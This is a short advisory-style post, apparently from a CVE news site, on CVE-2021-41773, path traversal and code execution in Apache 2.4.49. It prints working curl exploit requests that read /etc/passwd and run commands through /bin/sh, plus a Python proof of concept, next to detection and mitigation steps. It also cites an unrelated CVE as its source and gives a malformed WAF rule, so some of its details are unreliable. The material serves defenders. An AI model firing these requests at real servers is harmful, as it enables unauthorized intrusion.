Apache HTTP Server, Path Traversal & Remote Code Execution, CVE-2021-41773 (Critical)

How CVE-2021-41773 Works

A flaw in Apache HTTP Server 2.4.49 allows attackers to exploit path traversal, leading to remote code execution (RCE). The vulnerability occurs due to improper validation of URLs containing path traversal sequences (../). When `mod_proxy` is enabled, an attacker can bypass security checks and access files outside the document root. If CGI scripts are enabled, this can escalate to RCE by injecting malicious input. The issue stems from incomplete fixes in normalization logic, permitting crafted requests to leak system files or execute arbitrary commands.

DailyCVE Form

Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2021-10-05

What Undercode Say:

Exploitation:

1. Craft Malicious Request:

curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"

2. RCE via CGI:

curl -X POST "http://target.com/cgi-bin/.%2e/%2e%2e/bin/sh" -d "echo;id"

Detection:

1. Check Apache Version:

apache2 -v

2. Log Analysis:

grep "../" /var/log/apache2/access.log

Mitigation:

1. Patch Immediately:

sudo apt update && sudo apt upgrade apache2

2. Disable CGI:

<Directory "/usr/lib/cgi-bin">
Options -ExecCGI
</Directory>

3. WAF Rules:

location ~ .(..|\%2e\%2e) { deny all; }

PoC (Python):

import requests
url = "http://target.com/cgi-bin/.%2e/%2e%2e/etc/passwd"
response = requests.get(url)
print(response.text)

Post-Exploitation Checks:

find /var/www -type f -perm -o+w -ls

References:

References:

Reported By: https://www.cve.org/CVERecord?id=CVE-2024-20439
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top